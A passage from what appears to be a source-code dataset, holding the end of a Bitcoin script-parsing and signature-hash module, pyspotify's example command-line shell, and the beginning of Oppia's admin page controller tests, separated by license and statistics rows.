raise CScriptInvalidError('PUSHDATA1: missing data length')
datasize = bord(self[i])
i += 1
elif opcode == OP_PUSHDATA2:
pushdata_type = 'PUSHDATA2'
if i + 1 >= len(self):
raise CScriptInvalidError('PUSHDATA2: missing data length')
datasize = bord(self[i]) + (bord(self[i+1]) << 8)
i += 2
elif opcode == OP_PUSHDATA4:
pushdata_type = 'PUSHDATA4'
if i + 3 >= len(self):
raise CScriptInvalidError('PUSHDATA4: missing data length')
datasize = bord(self[i]) + (bord(self[i+1]) << 8) + (bord(self[i+2]) << 16) + (bord(self[i+3]) << 24)
i += 4
else:
assert False # shouldn't happen
data = bytes(self[i:i+datasize])
# Check for truncation
if len(data) < datasize:
raise CScriptTruncatedPushDataError('%s: truncated data' % pushdata_type, data)
i += datasize
yield (opcode, data, sop_idx)
def __iter__(self):
"""'Cooked' iteration
Returns either a CScriptOP instance, an integer, or bytes, as
appropriate.
See raw_iter() if you need to distinguish the different possible
PUSHDATA encodings.
"""
for (opcode, data, sop_idx) in self.raw_iter():
if data is not None:
yield data
else:
opcode = CScriptOp(opcode)
if opcode.is_small_int():
yield opcode.decode_op_n()
else:
yield CScriptOp(opcode)
def __repr__(self):
# For Python3 compatibility add b before strings so testcases don't
# need to change
def _repr(o):
if isinstance(o, bytes):
return "x('%s')" % binascii.hexlify(o).decode('utf8')
else:
return repr(o)
ops = []
i = iter(self)
while True:
op = None
try:
op = _repr(next(i))
except CScriptTruncatedPushDataError as err:
op = '%s...<ERROR: %s>' % (_repr(err.data), err)
break
except CScriptInvalidError as err:
op = '<ERROR: %s>' % err
break
except StopIteration:
break
finally:
if op is not None:
ops.append(op)
return "CScript([%s])" % ', '.join(ops)
def GetSigOpCount(self, fAccurate):
"""Get the SigOp count.
fAccurate - Accurately count CHECKMULTISIG, see BIP16 for details.
Note that this is consensus-critical.
"""
n = 0
lastOpcode = OP_INVALIDOPCODE
for (opcode, data, sop_idx) in self.raw_iter():
if opcode in (OP_CHECKSIG, OP_CHECKSIGVERIFY):
n += 1
elif opcode in (OP_CHECKMULTISIG, OP_CHECKMULTISIGVERIFY):
if fAccurate and (OP_1 <= lastOpcode <= OP_16):
n += opcode.decode_op_n()
else:
n += 20
lastOpcode = opcode
return n
SIGHASH_ALL = 1
SIGHASH_NONE = 2
SIGHASH_SINGLE = 3
SIGHASH_ANYONECANPAY = 0x80
def FindAndDelete(script, sig):
"""Consensus critical, see FindAndDelete() in Satoshi codebase"""
r = b''
last_sop_idx = sop_idx = 0
skip = True
for (opcode, data, sop_idx) in script.raw_iter():
if not skip:
r += script[last_sop_idx:sop_idx]
last_sop_idx = sop_idx
if script[sop_idx:sop_idx + len(sig)] == sig:
skip = True
else:
skip = False
if not skip:
r += script[last_sop_idx:]
return CScript(r)
def SignatureHash(script, txTo, inIdx, hashtype):
"""Consensus-correct SignatureHash
Returns (hash, err) to precisely match the consensus-critical behavior of
the SIGHASH_SINGLE bug. (inIdx is *not* checked for validity)
"""
HASH_ONE = b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
if inIdx >= len(txTo.vin):
return (HASH_ONE, "inIdx %d out of range (%d)" % (inIdx, len(txTo.vin)))
txtmp = CTransaction(txTo)
for txin in txtmp.vin:
txin.scriptSig = b''
txtmp.vin[inIdx].scriptSig = FindAndDelete(script, CScript([OP_CODESEPARATOR]))
if (hashtype & 0x1f) == SIGHASH_NONE:
txtmp.vout = []
for i in range(len(txtmp.vin)):
if i != inIdx:
txtmp.vin[i].nSequence = 0
elif (hashtype & 0x1f) == SIGHASH_SINGLE:
outIdx = inIdx
if outIdx >= len(txtmp.vout):
return (HASH_ONE, "outIdx %d out of range (%d)" % (outIdx, len(txtmp.vout)))
tmp = txtmp.vout[outIdx]
txtmp.vout = []
for i in range(outIdx):
txtmp.vout.append(CTxOut())
txtmp.vout.append(tmp)
for i in range(len(txtmp.vin)):
if i != inIdx:
txtmp.vin[i].nSequence = 0
if hashtype & SIGHASH_ANYONECANPAY:
tmp = txtmp.vin[inIdx]
txtmp.vin = []
txtmp.vin.append(tmp)
s = txtmp.serialize()
s += struct.pack(b"<I", hashtype)
hash = hash256(s)
return (hash, None)
| mit | -3,195,067,513,813,755,400 | 25.635045 | 146 | 0.566646 | false |
mopidy/pyspotify | examples/shell.py | 1 | 6169 | #!/usr/bin/env python
"""
This is an example of a simple command line client for Spotify using pyspotify.
You can run this file directly::
python shell.py
Then run the ``help`` command on the ``spotify>`` prompt to view all available
commands.
"""
from __future__ import print_function, unicode_literals
import cmd
import logging
import threading
import spotify
class Commander(cmd.Cmd):
doc_header = 'Commands'
prompt = 'spotify> '
logger = logging.getLogger('shell.commander')
def __init__(self):
cmd.Cmd.__init__(self)
self.logged_in = threading.Event()
self.logged_out = threading.Event()
self.logged_out.set()
self.session = spotify.Session()
self.session.on(
spotify.SessionEvent.CONNECTION_STATE_UPDATED,
self.on_connection_state_changed,
)
self.session.on(spotify.SessionEvent.END_OF_TRACK, self.on_end_of_track)
try:
self.audio_driver = spotify.AlsaSink(self.session)
except ImportError:
self.logger.warning(
'No audio sink found; audio playback unavailable.'
)
self.event_loop = spotify.EventLoop(self.session)
self.event_loop.start()
def on_connection_state_changed(self, session):
if session.connection.state is spotify.ConnectionState.LOGGED_IN:
self.logged_in.set()
self.logged_out.clear()
elif session.connection.state is spotify.ConnectionState.LOGGED_OUT:
self.logged_in.clear()
self.logged_out.set()
def on_end_of_track(self, session):
self.session.player.play(False)
def precmd(self, line):
if line:
self.logger.debug('New command: %s', line)
return line
def emptyline(self):
pass
def do_debug(self, line):
"Show more logging output"
print('Logging at DEBUG level')
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
def do_info(self, line):
"Show normal logging output"
print('Logging at INFO level')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def do_warning(self, line):
"Show less logging output"
print('Logging at WARNING level')
logger = logging.getLogger()
logger.setLevel(logging.WARNING)
def do_EOF(self, line):
"Exit"
if self.logged_in.is_set():
print('Logging out...')
self.session.logout()
self.logged_out.wait()
self.event_loop.stop()
print('')
return True
def do_login(self, line):
"login <username> <password>"
tokens = line.split(' ', 1)
if len(tokens) != 2:
self.logger.warning("Wrong number of arguments")
return
username, password = tokens
self.session.login(username, password, remember_me=True)
self.logged_in.wait()
def do_relogin(self, line):
"relogin -- login as the previous logged in user"
try:
self.session.relogin()
self.logged_in.wait()
except spotify.Error as e:
self.logger.error(e)
def do_forget_me(self, line):
"forget_me -- forget the previous logged in user"
self.session.forget_me()
def do_logout(self, line):
"logout"
self.session.logout()
self.logged_out.wait()
def do_whoami(self, line):
"whoami"
if self.logged_in.is_set():
self.logger.info(
'I am %s aka %s. You can find me at %s',
self.session.user.canonical_name,
self.session.user.display_name,
self.session.user.link,
)
else:
self.logger.info(
'I am not logged in, but I may be %s',
self.session.remembered_user,
)
def do_play_uri(self, line):
"play <spotify track uri>"
if not self.logged_in.is_set():
self.logger.warning('You must be logged in to play')
return
try:
track = self.session.get_track(line)
track.load()
except (ValueError, spotify.Error) as e:
self.logger.warning(e)
return
self.logger.info('Loading track into player')
self.session.player.load(track)
self.logger.info('Playing track')
self.session.player.play()
def do_pause(self, line):
self.logger.info('Pausing track')
self.session.player.play(False)
def do_resume(self, line):
self.logger.info('Resuming track')
self.session.player.play()
def do_stop(self, line):
self.logger.info('Stopping track')
self.session.player.play(False)
self.session.player.unload()
def do_seek(self, seconds):
"seek <seconds>"
if not self.logged_in.is_set():
self.logger.warning('You must be logged in to seek')
return
if self.session.player.state is spotify.PlayerState.UNLOADED:
self.logger.warning('A track must be loaded before seeking')
return
self.session.player.seek(int(seconds) * 1000)
def do_search(self, query):
"search <query>"
if not self.logged_in.is_set():
self.logger.warning('You must be logged in to search')
return
try:
result = self.session.search(query)
result.load()
except spotify.Error as e:
self.logger.warning(e)
return
self.logger.info(
'%d tracks, %d albums, %d artists, and %d playlists found.',
result.track_total,
result.album_total,
result.artist_total,
result.playlist_total,
)
self.logger.info('Top tracks:')
for track in result.tracks:
self.logger.info(
'[%s] %s - %s', track.link, track.artists[0].name, track.name
)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
Commander().cmdloop()
| apache-2.0 | 3,352,281,336,376,357,000 | 28.516746 | 80 | 0.573999 | false |
kevinlee12/oppia | core/controllers/admin_test.py | 1 | 85129 | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the admin page."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import logging
from constants import constants
from core import jobs
from core import jobs_registry
from core import jobs_test
from core.domain import collection_services
from core.domain import config_domain
from core.domain import config_services
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import opportunity_services
from core.domain import question_fetchers
from core.domain import recommendations_services
from core.domain import rights_manager
from core.domain import search_services
from core.domain import skill_services
from core.domain import stats_domain
from core.domain import stats_services
from core.domain import story_domain
from core.domain import story_fetchers
from core.domain import story_services
from core.domain import topic_domain
from core.domain import topic_fetchers
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.platform.taskqueue import gae_taskqueue_services as taskqueue_services
from core.tests import test_utils
import feconf
import utils
(exp_models, job_models, opportunity_models, audit_models) = (
models.Registry.import_models(
[models.NAMES.exploration, models.NAMES.job, models.NAMES.opportunity,
models.NAMES.audit]))
BOTH_MODERATOR_AND_ADMIN_EMAIL = '[email protected]'
BOTH_MODERATOR_AND_ADMIN_USERNAME = 'moderatorandadm1n'
class SampleMapReduceJobManager(jobs.BaseMapReduceOneOffJobManager):
"""Test job that counts the total number of explorations."""
@classmethod
def entity_classes_to_map_over(cls):
return [exp_models.ExplorationModel]
@staticmethod
def map(item):
yield ('sum', 1)
@staticmethod
def reduce(key, values):
yield (key, sum([int(value) for value in values]))
class AdminIntegrationTest(test_utils.GenericTestBase):
"""Server integration tests for operations on the admin page."""
def setUp(self):
"""Complete the signup process for self.ADMIN_EMAIL."""
super(AdminIntegrationTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
def test_admin_page_rights(self):
"""Test access rights to the admin page."""
self.get_html_response('/admin', expected_status_int=302)
# Login as a non-admin.
self.login(self.EDITOR_EMAIL)
self.get_html_response('/admin', expected_status_int=401)
self.logout()
# Login as an admin.
self.login(self.ADMIN_EMAIL, is_super_admin=True)
self.get_html_response('/admin')
self.logout()
def test_change_configuration_property(self):
"""Test that configuration properties can be changed."""
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
new_config_value = False
response_dict = self.get_json('/adminhandler')
response_config_properties = response_dict['config_properties']
self.assertDictContainsSubset({
'value': False,
}, response_config_properties[
config_domain.IS_IMPROVEMENTS_TAB_ENABLED.name])
payload = {
'action': 'save_config_properties',
'new_config_property_values': {
config_domain.IS_IMPROVEMENTS_TAB_ENABLED.name: (
new_config_value),
}
}
self.post_json('/adminhandler', payload, csrf_token=csrf_token)
response_dict = self.get_json('/adminhandler')
response_config_properties = response_dict['config_properties']
self.assertDictContainsSubset({
'value': new_config_value,
}, response_config_properties[
config_domain.IS_IMPROVEMENTS_TAB_ENABLED.name])
self.logout()
def test_cannot_reload_exploration_in_production_mode(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
prod_mode_swap = self.swap(constants, 'DEV_MODE', False)
assert_raises_regexp_context_manager = self.assertRaisesRegexp(
Exception, 'Cannot reload an exploration in production.')
with assert_raises_regexp_context_manager, prod_mode_swap:
self.post_json(
'/adminhandler', {
'action': 'reload_exploration',
'exploration_id': '2'
}, csrf_token=csrf_token)
self.logout()
def test_cannot_load_new_structures_data_in_production_mode(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
prod_mode_swap = self.swap(constants, 'DEV_MODE', False)
assert_raises_regexp_context_manager = self.assertRaisesRegexp(
Exception, 'Cannot load new structures data in production.')
with assert_raises_regexp_context_manager, prod_mode_swap:
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_new_structures_data'
}, csrf_token=csrf_token)
self.logout()
def test_non_admins_cannot_load_new_structures_data(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
assert_raises_regexp = self.assertRaisesRegexp(
Exception, 'User does not have enough rights to generate data.')
with assert_raises_regexp:
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_new_structures_data'
}, csrf_token=csrf_token)
self.logout()
def test_cannot_generate_dummy_skill_data_in_production_mode(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
prod_mode_swap = self.swap(constants, 'DEV_MODE', False)
assert_raises_regexp_context_manager = self.assertRaisesRegexp(
Exception, 'Cannot generate dummy skills in production.')
with assert_raises_regexp_context_manager, prod_mode_swap:
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_new_skill_data'
}, csrf_token=csrf_token)
self.logout()
def test_non_admins_cannot_generate_dummy_skill_data(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
assert_raises_regexp = self.assertRaisesRegexp(
Exception, 'User does not have enough rights to generate data.')
with assert_raises_regexp:
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_new_skill_data'
}, csrf_token=csrf_token)
self.logout()
def test_cannot_reload_collection_in_production_mode(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
prod_mode_swap = self.swap(constants, 'DEV_MODE', False)
assert_raises_regexp_context_manager = self.assertRaisesRegexp(
Exception, 'Cannot reload a collection in production.')
with assert_raises_regexp_context_manager, prod_mode_swap:
self.post_json(
'/adminhandler', {
'action': 'reload_collection',
'collection_id': '2'
}, csrf_token=csrf_token)
self.logout()
def test_reload_collection(self):
observed_log_messages = []
def _mock_logging_function(msg, *args):
"""Mocks logging.info()."""
observed_log_messages.append(msg % args)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
collection_services.load_demo('0')
collection_rights = rights_manager.get_collection_rights('0')
self.assertFalse(collection_rights.community_owned)
with self.swap(logging, 'info', _mock_logging_function):
self.post_json(
'/adminhandler', {
'action': 'reload_collection',
'collection_id': '0'
}, csrf_token=csrf_token)
collection_rights = rights_manager.get_collection_rights('0')
self.assertTrue(collection_rights.community_owned)
self.assertEqual(
observed_log_messages,
[
'[ADMIN] %s reloaded collection 0' % self.admin_id,
'Collection with id 0 was loaded.'
]
)
self.logout()
def test_load_new_structures_data(self):
self.set_admins([self.ADMIN_USERNAME])
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_new_structures_data'
}, csrf_token=csrf_token)
topic_summaries = topic_services.get_all_topic_summaries()
self.assertEqual(len(topic_summaries), 2)
for summary in topic_summaries:
if summary.name == 'Dummy Topic 1':
topic_id = summary.id
story_id = (
topic_fetchers.get_topic_by_id(
topic_id).canonical_story_references[0].story_id)
self.assertIsNotNone(
story_fetchers.get_story_by_id(story_id, strict=False))
skill_summaries = skill_services.get_all_skill_summaries()
self.assertEqual(len(skill_summaries), 3)
questions, _, _ = (
question_fetchers.get_questions_and_skill_descriptions_by_skill_ids(
10, [
skill_summaries[0].id, skill_summaries[1].id,
skill_summaries[2].id], '')
)
self.assertEqual(len(questions), 3)
# Testing that there are 3 hindi translation opportunities
# available on the Contributor Dashboard. Hindi was picked arbitrarily,
# any language code other than english (what the dummy explorations
# were written in) can be tested here.
translation_opportunities, _, _ = (
opportunity_services.get_translation_opportunities('hi', None))
self.assertEqual(len(translation_opportunities), 3)
self.logout()
def test_generate_dummy_skill_and_questions_data(self):
self.set_admins([self.ADMIN_USERNAME])
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_new_skill_data'
}, csrf_token=csrf_token)
skill_summaries = skill_services.get_all_skill_summaries()
self.assertEqual(len(skill_summaries), 1)
questions, _, _ = (
question_fetchers.get_questions_and_skill_descriptions_by_skill_ids(
20, [skill_summaries[0].id], '')
)
self.assertEqual(len(questions), 15)
self.logout()
def test_flush_migration_bot_contributions_action(self):
created_exploration_ids = ['exp_1', 'exp_2']
edited_exploration_ids = ['exp_3', 'exp_4']
user_services.create_user_contributions(
feconf.MIGRATION_BOT_USER_ID, created_exploration_ids,
edited_exploration_ids)
migration_bot_contributions_model = (
user_services.get_user_contributions(feconf.MIGRATION_BOT_USER_ID))
self.assertEqual(
migration_bot_contributions_model.created_exploration_ids,
created_exploration_ids)
self.assertEqual(
migration_bot_contributions_model.edited_exploration_ids,
edited_exploration_ids)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'flush_migration_bot_contribution_data'
}, csrf_token=csrf_token)
migration_bot_contributions_model = (
user_services.get_user_contributions(feconf.MIGRATION_BOT_USER_ID))
self.assertEqual(
migration_bot_contributions_model.created_exploration_ids, [])
self.assertEqual(
migration_bot_contributions_model.edited_exploration_ids, [])
def test_regenerate_topic_related_opportunities_action(self):
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
topic_id = 'topic'
story_id = 'story'
self.save_new_valid_exploration(
'0', owner_id, title='title',
end_state_name='End State')
self.publish_exploration(owner_id, '0')
topic = topic_domain.Topic.create_default_topic(
topic_id, 'topic', 'abbrev', 'description')
topic_services.save_new_topic(owner_id, topic)
story = story_domain.Story.create_default_story(
story_id, 'A story', 'Description', topic_id, 'story')
story_services.save_new_story(owner_id, story)
topic_services.add_canonical_story(
owner_id, topic_id, story_id)
story_services.update_story(
owner_id, story_id, [story_domain.StoryChange({
'cmd': 'add_story_node',
'node_id': 'node_1',
'title': 'Node1',
}), story_domain.StoryChange({
'cmd': 'update_story_node_property',
'property_name': 'exploration_id',
'node_id': 'node_1',
'old_value': None,
'new_value': '0'
})], 'Changes.')
all_opportunity_models = list(
opportunity_models.ExplorationOpportunitySummaryModel.get_all())
self.assertEqual(len(all_opportunity_models), 1)
old_creation_time = all_opportunity_models[0].created_on
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
result = self.post_json(
'/adminhandler', {
'action': 'regenerate_topic_related_opportunities',
'topic_id': 'topic'
}, csrf_token=csrf_token)
self.assertEqual(
result, {
'opportunities_count': 1
})
all_opportunity_models = list(
opportunity_models.ExplorationOpportunitySummaryModel.get_all())
self.assertEqual(len(all_opportunity_models), 1)
new_creation_time = all_opportunity_models[0].created_on
self.assertLess(old_creation_time, new_creation_time)
def test_admin_topics_csv_download_handler(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_custom_response(
'/admintopicscsvdownloadhandler', 'text/csv')
self.assertEqual(
response.headers['Content-Disposition'],
'attachment; filename=topic_similarities.csv')
self.assertIn(
'Architecture,Art,Biology,Business,Chemistry,Computing,Economics,'
'Education,Engineering,Environment,Geography,Government,Hobbies,'
'Languages,Law,Life Skills,Mathematics,Medicine,Music,Philosophy,'
'Physics,Programming,Psychology,Puzzles,Reading,Religion,Sport,'
'Statistics,Welcome',
response.body)
self.logout()
def test_admin_job_output_handler(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
self.save_new_valid_exploration('exp_id', self.admin_id)
job_id = SampleMapReduceJobManager.create_new()
SampleMapReduceJobManager.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
response = self.get_json('/adminjoboutput', params={'job_id': job_id})
self.assertIsNone(response['output'])
self.process_and_flush_pending_tasks()
response = self.get_json('/adminjoboutput', params={'job_id': job_id})
self.assertEqual(
SampleMapReduceJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
self.assertEqual(response['output'], ['[u\'sum\', 1]'])
self.logout()
def test_revert_config_property(self):
observed_log_messages = []
def _mock_logging_function(msg, *args):
"""Mocks logging.info()."""
observed_log_messages.append(msg % args)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
config_services.set_property(self.admin_id, 'promo_bar_enabled', True)
self.assertTrue(config_domain.PROMO_BAR_ENABLED.value)
with self.swap(logging, 'info', _mock_logging_function):
self.post_json(
'/adminhandler', {
'action': 'revert_config_property',
'config_property_id': 'promo_bar_enabled'
}, csrf_token=csrf_token)
self.assertFalse(config_domain.PROMO_BAR_ENABLED.value)
self.assertEqual(
observed_log_messages,
['[ADMIN] %s reverted config property: promo_bar_enabled'
% self.admin_id])
self.logout()
def test_start_new_one_off_job(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 0)
with self.swap(
jobs_registry, 'ONE_OFF_JOB_MANAGERS', [SampleMapReduceJobManager]):
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'start_new_job',
'job_type': 'SampleMapReduceJobManager'
}, csrf_token=csrf_token)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.logout()
def test_cancel_one_off_job(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
job_id = SampleMapReduceJobManager.create_new()
SampleMapReduceJobManager.enqueue(job_id)
self.run_but_do_not_flush_pending_tasks()
status = SampleMapReduceJobManager.get_status_code(job_id)
self.assertEqual(status, job_models.STATUS_CODE_STARTED)
with self.swap(
jobs_registry, 'ONE_OFF_JOB_MANAGERS', [SampleMapReduceJobManager]):
self.get_json('/adminhandler')
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'cancel_job',
'job_id': job_id,
'job_type': 'SampleMapReduceJobManager'
}, csrf_token=csrf_token)
status = SampleMapReduceJobManager.get_status_code(job_id)
self.assertEqual(status, job_models.STATUS_CODE_CANCELED)
self.logout()
def test_start_computation(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id')
exp_services.save_new_exploration('owner_id', exploration)
self.assertEqual(
jobs_test.StartExplorationEventCounter.get_count('exp_id'), 0)
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
[jobs_test.StartExplorationEventCounter]):
self.get_json('/adminhandler')
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'start_computation',
'computation_type': 'StartExplorationEventCounter'
}, csrf_token=csrf_token)
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING)
self.logout()
def test_stop_computation_with_running_jobs(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id')
exp_services.save_new_exploration('owner_id', exploration)
self.assertEqual(
jobs_test.StartExplorationEventCounter.get_count('exp_id'), 0)
jobs_test.StartExplorationEventCounter.start_computation()
self.run_but_do_not_flush_pending_tasks()
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING)
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
[jobs_test.StartExplorationEventCounter]):
self.get_json('/adminhandler')
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'stop_computation',
'computation_type': 'StartExplorationEventCounter'
}, csrf_token=csrf_token)
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
self.logout()
def test_stop_computation_with_finished_jobs(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id')
exp_services.save_new_exploration('owner_id', exploration)
self.assertEqual(
jobs_test.StartExplorationEventCounter.get_count('exp_id'), 0)
jobs_test.StartExplorationEventCounter.start_computation()
self.process_and_flush_pending_tasks()
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING)
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
[jobs_test.StartExplorationEventCounter]):
self.get_json('/adminhandler')
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'stop_computation',
'computation_type': 'StartExplorationEventCounter'
}, csrf_token=csrf_token)
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
self.logout()
def test_stop_computation_with_stopped_jobs(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id')
exp_services.save_new_exploration('owner_id', exploration)
self.assertEqual(
jobs_test.StartExplorationEventCounter.get_count('exp_id'), 0)
jobs_test.StartExplorationEventCounter.start_computation()
self.run_but_do_not_flush_pending_tasks()
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING)
jobs_test.StartExplorationEventCounter.stop_computation(self.admin_id)
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
[jobs_test.StartExplorationEventCounter]):
self.get_json('/adminhandler')
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'stop_computation',
'computation_type': 'StartExplorationEventCounter'
}, csrf_token=csrf_token)
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
self.logout()
def test_upload_topic_similarities(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.assertEqual(recommendations_services.get_topic_similarity(
'Art', 'Biology'), 0.1)
self.assertEqual(recommendations_services.get_topic_similarity(
'Art', 'Art'), feconf.SAME_TOPIC_SIMILARITY)
self.assertEqual(recommendations_services.get_topic_similarity(
'Topic 1', 'Topic 2'), feconf.DEFAULT_TOPIC_SIMILARITY)
self.assertEqual(recommendations_services.get_topic_similarity(
'Topic', 'Topic'), feconf.SAME_TOPIC_SIMILARITY)
topic_similarities_data = (
'Art,Biology,Chemistry\n'
'1.0,0.2,0.1\n'
'0.2,1.0,0.8\n'
'0.1,0.8,1.0'
)
self.post_json(
'/adminhandler', {
'action': 'upload_topic_similarities',
'data': topic_similarities_data
}, csrf_token=csrf_token)
self.assertEqual(recommendations_services.get_topic_similarity(
'Art', 'Biology'), 0.2)
self.logout()
class GenerateDummyExplorationsTest(test_utils.GenericTestBase):
"""Test the conditions for generation of dummy explorations."""
def setUp(self):
super(GenerateDummyExplorationsTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
def test_generate_count_greater_than_publish_count(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_explorations',
'num_dummy_exps_to_generate': 10,
'num_dummy_exps_to_publish': 3
}, csrf_token=csrf_token)
generated_exps = exp_services.get_all_exploration_summaries()
published_exps = exp_services.get_recently_published_exp_summaries(5)
self.assertEqual(len(generated_exps), 10)
self.assertEqual(len(published_exps), 3)
def test_generate_count_equal_to_publish_count(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_explorations',
'num_dummy_exps_to_generate': 2,
'num_dummy_exps_to_publish': 2
}, csrf_token=csrf_token)
generated_exps = exp_services.get_all_exploration_summaries()
published_exps = exp_services.get_recently_published_exp_summaries(5)
self.assertEqual(len(generated_exps), 2)
self.assertEqual(len(published_exps), 2)
def test_generate_count_less_than_publish_count(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
generated_exps_response = self.post_json(
'/adminhandler', {
'action': 'generate_dummy_explorations',
'num_dummy_exps_to_generate': 2,
'num_dummy_exps_to_publish': 5
},
csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(generated_exps_response['status_code'], 400)
generated_exps = exp_services.get_all_exploration_summaries()
published_exps = exp_services.get_recently_published_exp_summaries(5)
self.assertEqual(len(generated_exps), 0)
self.assertEqual(len(published_exps), 0)
def test_handler_raises_error_with_non_int_num_dummy_exps_to_generate(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
